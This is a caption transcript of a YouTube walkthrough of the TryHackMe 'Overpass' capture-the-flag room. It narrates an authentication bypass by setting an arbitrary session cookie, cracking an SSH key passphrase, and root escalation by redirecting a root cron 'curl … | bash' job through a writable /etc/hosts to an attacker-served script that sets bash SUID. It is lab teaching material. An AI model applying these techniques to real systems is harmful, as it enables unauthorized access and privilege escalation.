TryHackMe! Overpass - Authentication Bypass

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

hello everybody my name is john hammond welcome back to the youtube video we're still looking at some try hack me so let's hop on over to my screen and get to it i want to showcase the overpass room because i just kind of found it and i thought it was really kind of interesting a neat idea i also saw there is overpass too that is out right now and i want to pour into that but uh first we got to get through with the starting thing so this theme or the kind of prompt for this box is what happens when some broke computer science student makes a password manager um i have already submitted flags for this so please forgive me and that those are visible there but we'll dive in as how to get to those and find them as we always do so it says obviously it's a perfect commercial success whenever computer science students try to make a password manager and there's also a little easter egg they say there is a try hack me subscription code hidden on this box first person to find and activate it will get one month subscription for free if you're already a subscriber you can just give the code away and do some good stuff uh but that has already been claimed this room is about a month old i realize my face is kind of in the way so you can't see that message there but anyway we have our machine ip address it's up and it's running and i'm connected to the vpn so let's get started and try and work with it i will make directory for youtube overpass so we have a place to work and i'll get started with an nmap scan while we kind of put together our notes document so nmap tac sc for default scripts tac sv to search for versions tac o n so i end map output to a simple nmap format and of course i'll paste in the ip address all right uh while that's running let's make a simple readme file so we can kind of keep track of things i tend to do that just because it's good practice sometimes while i'm doing this video i might just sort of forget please forgive me and it is currently august 18th 2020 and i'll slap my name in there maybe if you just end up like throwing this in github or something or you're just sharing your notes in your repository who knows what you're working on um we'll just go ahead and copy these prompts here slap him in good enough easy peasy i realize there is a uh like try hack me api that you could use it's like a library in python and i need to tinker with that because i want to write a script that could do something like this for larger rooms that have like more information in them because that way you'll just automatically have this readme and you won't have to really work with much we've got some interesting stuff open our nmap scan is up in an accessible so let's check that out looks like we have port 22 open so classic ssh looks like it's running on ubuntu and port 80. http and it's golang interesting you don't often see that very cool okay um looks like that's it looks like we only have those two ports just to be safe uh let's turn off those safe scripts or whatever those are and let's run our all port scan with hackptac all those there we go let's get started to run that and let's explore that webpage while we know that that's a thing all right just opening up the ip address in our web browser it says welcome to overpass a secure password manager with support for windows linux mac os and more this is interesting because you it's like an actual like relatively somewhat of a web page here people reuse the same password for multiple services if you're one of them you're risking your accounts being hacked by evil hackers overpass allows you to secure different passwords for every server is protected using military-grade cryptography to keep you safe oh yeah okay passwords ever transmitted over the internet in any form unlike password managers overpass does not store your passwords unlike other password managers download overpass today all right let's check out the source i just hit control u on my keyboard to do that um looks like they are loading like local javascript and console log hello world so if i were to go back to the page and check out the console tab yep you can see that guy right there nice cool great i'm also just going to take a look at the css file in case i hide anything in there i think that's kind of good practice just something good to do images i'm not extremely concerned about if we kind of run out of things to do we could do like cheesy stego on that or some other reconnaissance but oh there's an html comment here yeah right just because the romans used it doesn't make it military grade change this ah okay roman's using secure cryptography that hints towards like rot 13 and caesar ciphers right so okay that's clearly not incredibly strong cryptography there's a downloads page so let's go check that out hop on over here stay safe against hackers use overpass oh and they have pre-compiled binaries and they have the source code nice okay anything else in this overpass go build scripts these are all like a specific directory build oh what's in that about us page sorry before i forget i just kind of want to keep looking around anything here in this source nope nothing hiding ng oh i like that cymax is in there ninja cool this is really cool all the tri hackme guys i love it great okay let's take a look at this code that they're showcasing here source code and build script let's look at this thing oh i already have these files downloaded that's embarrassing they're still in my downloads folder who cares illusion art artifice um let me make a directory for like source and let's move downloads overpass dot source yeah it's not go sorry into here same thing with build i still have the the binary itself dsh we'll put that in here as well so let's take a look at those let's take a look at the source code over pass go and it's written go kind of neat i wish i were smarter and go i wish i could just like write go like as well as i could write python because that language is crazy cool it's able to do stuff like everywhere other than the like scripts and binaries being like megs and size but okay looks like a past list entry is a structure so it has a name and a password and a function for rot47 excellent the secure encryption algorithm blatantly ripped and stolen from this url okay incredible uh i will press the i believe button on that and say that that just does a regular rot 47 at least for now if it does do anything else and we just don't see it then whatever we don't we don't need to wear with it we can go ahead and reverse engineer it as needed save threads to file where does it save all these does it have a path like a default path load creds from file json input oh python style input function neato service search password for service i'm just kind of like slowly cursory looking through these to get an idea for kind of what these functions are and what they do i don't think like there's no obvious glaring like okay bad eval or unsafe function that might be sticking out but it's good to kind of peruse through this delete password from service how does it do that that's not found print all passwords and it just loops through all of them okay oh creds path is in the home directory.overpass good to know and that's probably stored in some like martialized or whatever json format as we saw up top okay and we have this menu here and just a little command line interface to answer or select one option that's pretty easy enough they did have the binaries so we could just kind of tinker with it and play with it um let's do that oh what was that build script sorry before i forget build script.sh go os or gooz which is always fun that's in go setting an environment variable for how to install it and work with it overpasscode does it just do it for like literally everything that's awesome and echo datetakar builds completed oh it's just kind of like command inject man substitution in there to get the date maybe we could potentially abuse that at some point obviously we're just like we've downloaded this locally but we are supposed to get into this box somehow so we should mess with that all right whatever uh let's take a look at the binary you could download it i have already downloaded it i'm just gonna grab the linux one uh it didn't download because i didn't click it hard enough apparently but i still have the binary doing it earlier so let's move that in here and let's look at it it is now i realize typing at the bottom of my screen might annoy you sorry mark that is executable overpass linux and run it there we go yeah let's let's just hop over into uh another window up here so i'm not at the very bottom of my screen because i heard some people say like hey i don't like to read it because the youtube play stuff gets in the way so here we go welcome to overpass retrieve a password for a service one uh john that's it it died okay retrieve all passwords john oh again this also still exists because of my home directory dot overpass man i'm really ruining the illusion here right so this is rod47 this is the weird uh notation that it's apparently encrypting and storing all the stuff in um keep note you can normally identify raw47 by the weird random sheer amount of punctuation marks uh and i'll just do a simple stupid online rot47 decoder slap that in decrypt okay yeah so now you might be able to see i have john john john is the name and john is the password super boring but that's how it would simply work okay so now that we've looked at this code and we've looked at this source we've looked at this build script we looked at the executable i don't see a whole lot else here uh and since they give us like an actual website sometimes you're like oh wait whoops i for i spent so much time exploring the website that i forgot to run my regular normal enumeration procedures so don't forget fire up that simple neuto i'll t that to nikto.log if i can type great also do the same with a little go buster i'll do a go buster dir attack you with that url and we'll use a w for my word list and then i store the directoryless medium over in my op directory and we will fire that off okay we'll see what that comes up with realistically we probably should have been running that while we were looking through oh did it fail and that http client is that the right that is the right ip address can i ping that thing oh sorry yep is it just because nico's working that's funny error running goobster i don't know if you can see that uh typo there nice let's do it again maybe i'll stop neat though we'll let go buster have a little bit of precedence here still dies all right let me pause and figure this out oh you know what it might be that annoying nmap scan beating it up maybe i don't need a last lasting forward slash let's see if that will work there we go all right turning off the nmap scan just kind of let it do its thing that's fine about us downloads img we saw that already oh a slash admin that is something we had not seen or looked at before so let's hop over there slash admin administer access looks like we need credentials please log in to access this content okay uh we could try the basic stupid admin admin that doesn't work admin password that doesn't work we could try for basic stupid sql injection or one equals one oh using two hyphens to do a sql light comment using a hashtag or an octothorpe to do it with the sql syntax mysql syntax switching it up to a single quote or a double quote for strings none of those work okay is there anything on this page that's interesting body only another css file okay nothing there interesting anyway main.js as usual oh but there's a login.js and a cookie.js that's peculiar what is that cookie oh okay that's just a regular minified library used in other places jscookie mit license so that might not be too interesting for us how about login.js okay yeah this looks custom this like this looks like it's just written specifically for this so we have a post data function with a url data response a weight fetching a url with the post method credentials headers url form encoded follow any redirect get the body and then return the response okay sometimes it's not always json that's peculiar encode form data that looks like it just kind of puts it into like a yeah like okay post data format onload which is just we saw in the source code that would like run as soon as the page loaded okay would look for a login on you clicking submit it will run login function rather than submitting the form as html normally would so this login function is where all the interesting stuff happens okay we have username box which is getting all the information out of that field same thing with passwords same thing with login text content equals nothing creds is just going to be a little dictionary associative array hash table with the values pulled from the fields and we will post to that resource api login with our creds and it'll get a constant status or cookie with a response object from that post data function returning okay and then we do a check on client-side code in javascript so if the status or cookie is equal equal equal to incorrect credentials then we know that failed gotcha or otherwise huh oh we set a cookie session token session status or cookie window location okay so it brings us to the exact same page it just has a cookie working but that's interesting because what could that value be obviously if it's just not like incorrect credentials it could just be like literally anything right like what what could that be if we were to set that would that work if we just set that to like anything literally we could control that because a cookie is something we can tamper with just as easily let me um try that in curl so let's make go buster shut up and let's try to close out some of these because we don't need these to take up the entire terminal for us um let's hop over to the original page right and let's try and curl that just to get it from the command line i don't have like a cookie editor thing quickly installed like a cookie editor browser plug-in or manager on my firefox or my chrome here so i'm just going to use a simple curl for a proof of concept i'm going to specify tag h to use a header will that work i'd have to use like a set cookie thing um i think curl just has like a tac-tac cookies yeah nope cookies is unknown is it cookie yeah a cookie requires a parameter okay quick troubleshooting to see if that command line argument actually exists uh so we'll specify what was the name of that session token yeah we'll set it equal to literally anything and we have a private key okay so i guess that did work um since it's all javascript we could probably do the exact same thing this code would run in the context of this window because it's pulling in that cookie.js so if i were to open up the console again and just slap this the syntax in uh status or cookie is not defined that variable we can just set once again like literally anything now if i refresh this page that cookie is set and we can see it in our browser so since you keep forgetting your password james i've set up ssh keys for you if you forget the password for this crack yourself i'm tired of fixing stuff for you also we really need to talk about this military grid encryption nice okay so here's a private key reading that prompt it sounds like we need to crack a password for this thing so let's make a directory for ssh and slap this in here as an id rsa uh don't forget to include a private key at the excuse me include a new line at the very very end of your private key that can trip you up sometimes if it says like unknown format or something um let's mark it as our own so chmod 600 and i'm assuming we'll have a username james because it references this this individual james here so let's grab that ip address and try to ssh tag i with that id rsa james at this ip address not a url please thank you see if that will work for us yep i'm totally cool with connecting to it let's do it we need a passphrase okay uh let's do that with john the ripper so i have uh opt rockyou.txt i have this regular word list for brute forcing that's just in my op directory there's tons and tons of stuff and i also have john the ripper so that's in opt john the ripper run john if you don't have that installed go grab it off of their github repository it's like magnum ripper john the ripper it's a community edition jumbo john i think it's it's called and then just do it go into the source directory do a dot slash configure and do it make and install and it'll build it all for you so super easy super cool let's run john on uh actually we need to convert this specific format right because john will offer some scripts like ssh to john that will use a file format and kind of convert into something that john the ripper could work with so i'll just make a for john dot text that's good now with that done we can run john on that for john dot text but let me specify the word list here i'll use opt rock you that wordless for him and i'll run for john and let's see if he gets a hit and he does okay so james 13 is apparently that password cool cool that's glove fun what are you doing over there john the ripper what are you doing let's just stop that actually because i don't need this extra session when i still have that in my command history this thing connect to it please and the password should be james 13. good good good i typed that right let it connect okay let me pause this video real quick okay that took forever but i have kodak's used i'm on the box i msshed msshden so okay in our home directory as this james user i can see a user.txt file which we will clap out here cat that out crap that out all the words and uh that will give us our points for that user uh though we also have a little to do dot text which is interesting update overpass encryption burlin is complaining that it's not strong enough yeah write down my password somewhere on a sticky note so i don't forget it wait we make a password manager why not just use that test overpass for mac os it builds fine but i'm not sure it actually works ask paradox how we got around how we got the automated build strip working and where the builds go they're not updating on the website ah automated build script is it still is it like running here because i know we had that thought we could maybe like get in the middle of that date command running or something okay whatever let's uh see if we have a password he mentioned he has been using the password manager oh and we have an overpass file okay so that hidden directory again right so let's cat out that overpass and we see his information it's simple rot47 so i had that rot47 decoder online and i could just once again slap that in go name the system pass say drawnling picture okay whatever is system referring to like this system system like would i be able to like sudo like is that his password if i paste that in okay that is his password but james can't run pseudo boring okay um we could do a regular enumeration what's in the is our are there any other users we get into there's a try hackme user nope can't get into that anything in root nothing particularly interesting okay so let's throw like lynn enum or lin p's in here let's see if we can find a way to around this um i'm going to use quake which i use as part of my cheesy like poor man's pen test framework ideas because i would like to be able to upload or download a file right so i have these commands like upload file with netcat or like wget or other method to get a file on the box normally if you're using this with pwncat it's much better and we could get like a pwn cat shell if we wanted to but i'll just showcase this one because i think la nina might highlight some things a little bit better uh for your learning and for us to walk through this together so let me show you like what that is before i just totally say that this is what we're going to do and then you don't understand any of it so let's fire that up in sublime text i'm using my pmp or opt poor men's pen test functions and that will grab like my ip address my local host ip address so it knows or my ton zero ip address excuse me so it knows how to reach the vpn in that box and back and forth to go random port it'll specify a file name out of this little dollar sign excuse me out of this command line argument we pass in we'll hide quake which is on how i'm using to invoke this um and we'll get focus back to our actual window and we will run a netcat listener grabbing this file on our host and then we'll send the command with xte or x automation to simulate typing in uh on the victim this netcat command to download and pull this file in so that's all that's doing this silly poor man's pen test because i'm like automating keystrokes inside of my reverse shell so i can quote-unquote script inside of it you don't have that real functionality but pwncat will let you do that so i would always recommend to use pwncap but i guess i'm just not in this case stupid me let's upload lin p's there we go that slapped in i'm gonna give it a second i'll check okay yeah quake says it's got everything it's done so let me let close out of that and it just threw it in devvs hm shared memory because i like to hide in there file that it is a shell script so let's run it and let's dot slash okay marked as executable worked a ton of stuff i'm using kind of the one of the later versions of lin p's i think or at least newer than i had ran previously because now it'll cache directories or like be able to figure out a lot of good stuff so we'll let that go and then we'll start to look through it i guess we can kind of look through it as it's going so nothing wrong with that lynn pease we have ping we have netcat incredible old pseudo version good to note kind of exploring and see if there's anything that just jumps out lynn p's is great because it'll color code things that are potentially or very very likely a privilege escalation utility useful software we have a lot python we have base64 all these things we have compilers goodness rude is running some stuff crawn cron's in there why are they running cron i wonder if that's that automatic build script cron jobs has some yeah those are all defaults they look like defaults oh what is that line so that's cron syntax so every minute of every day every hour of every day of every month uh as the user root interesting we will curl overpass.thm looks like a little hostname or domain name download sourcebuildscript.sh and pipe it to bash whoa okay funky that is a an obvious and egregious method that we could abuse to privilege escalate because if roots running that then we'll get code execution as root if that's just getting piped into bash can we control that though at overpass.thm where are they setting that domain name that's normally in etc hosts do we have right access to etcetera host that's normally a weird thing hostname okay yeah we can see that hostname host and dns that's that's definitely the output of our etc hosts file but can i write to that that's odd listening port super users are root yep okay try hacking me looks like dragon is a lot of privileges he's in pseudo blah blah blah blah blah rsync stuff possible private keys yep we found those we have those cloud on it files sued files nothing stands out to me capabilities weird to see a cd-rom file okay modified interesting oh gpg stuff that's peculiar writable log files backup files all hidden files there's a lot in here whoa okay i don't need to see all that interesting right off interesting writable files owned by me are writable by everyone that are not in my home directory etc hosts is in the list okay okay cool so if we can modify etc then what we could do is we could act as that curl command right that was in oh boy i gotta find it again now it was the curling overpass.thm slash downloads slash source build script.sage pipe to bash and that would run like every minute right so if i were to try and do that now looks like it's getting okay the one off of this website but let's modify that so right now let me change this profile this will be the victim that we're in and this will be my server my machine because i want to know my ip address if i could type ton 0 ip address address show my ip address there and let's modify that etcetera hosts file because we do have write access in there supposedly and let's change the overpass thm location and make it my address yeah so that way if i were to ping overpass.thm you can see now i'm actually reaching my attacker machine great so let's make a little directory for ourselves and we'll like fake and simulate like pseudo create the same file structure as what that command is expecting in cron as it's running every minute so let me make let's see it's a downloads source and then we have the script itself so let's make attack p to make all of those directories let's hop in there and let's create a simple bash script build script.sh that will bin bash there we go and we can have this do literally whatever we want because that will be executed through bash um i think the easiest way to give us accessible root privileges is make the bash binary set uid so that way we'll be able to like i don't know invoke it and keep our root privileges so right now if you check out the permissions on bin bash sure it is an owned by root executable but it doesn't have a sticky bit set or it's not set uid um using that we could just invoke it with tacp and that way we could maintain root readily and easily you could do other things like call back a reverse shell or whatever you want but i want to kind of keep me in this for simplicity's sake all right let's hurry it up because we're getting to a really long video and this really doesn't need to be so let's get back to the root of this directory right let's actually watch this ls tak la and see when it's gonna hit looks like i still have like half a minute to go and this will we know from the crown output this will happen on the clock every minute on the minute so let's fire up my http server and that's going to listen on port 8000 by default so if i want to specify port 80 i could specify that as a last argument but we need root privileges to do that on my ubuntu system so let me sudo python attack m that type in my password as fast as i can great now we are very very close to the end of the minute so we should see a get request come through on our attacker machine done and we should see this switch to an s or a sticky bit set uid all right so let's stop watching that and let's bin bash tag p and now we're root very very cool we were just abusing that little curl command that's in cron that is a running commands as root and it's pulled from an external resource or at least we can control where that resource is because it's in etc host file that we have right access to so we could hop on over to root and we could simply cut out that root.text and be done with it nice nice nice uh the easter egg if you wanted to you could go find that uh whoa careful there john if you wanted to you could go check out tryhackme uh that user account that we saw he does have an overpass account so we could cut out that file and see what other information that might have as usual it's just rot47 so we can go hop over to this little decoder decrypt that and kind of cheesy there's a little try acme subscription code but someone has already found that right no sense trying to submit it but very very neat very very cool very very fun i really liked the idea of this box and that was kind of fun um and it was cool to kind of work through some of those and i liked that simple etcetera host trick so i hope you guys thought that was also very neat very enjoyable um take good notes if that's something that you want to do as usual i started the readme file and then did nothing with it whatsoever but uh hey thank you guys so much for watching i really hope you enjoyed this video if you did please do press that like button do the youtube algorithm things leave me a comment hopefully subscribe thank you you guys the best thanks so much for watching i'll see you in the next video take care [Music] you

Info

Channel: John Hammond

Views: 134,890

Rating: undefined out of 5

Keywords:

Id: NGNnxD0gNDw

Channel Id: undefined

Length: 35min 18sec (2118 seconds)

Published: Wed Aug 19 2020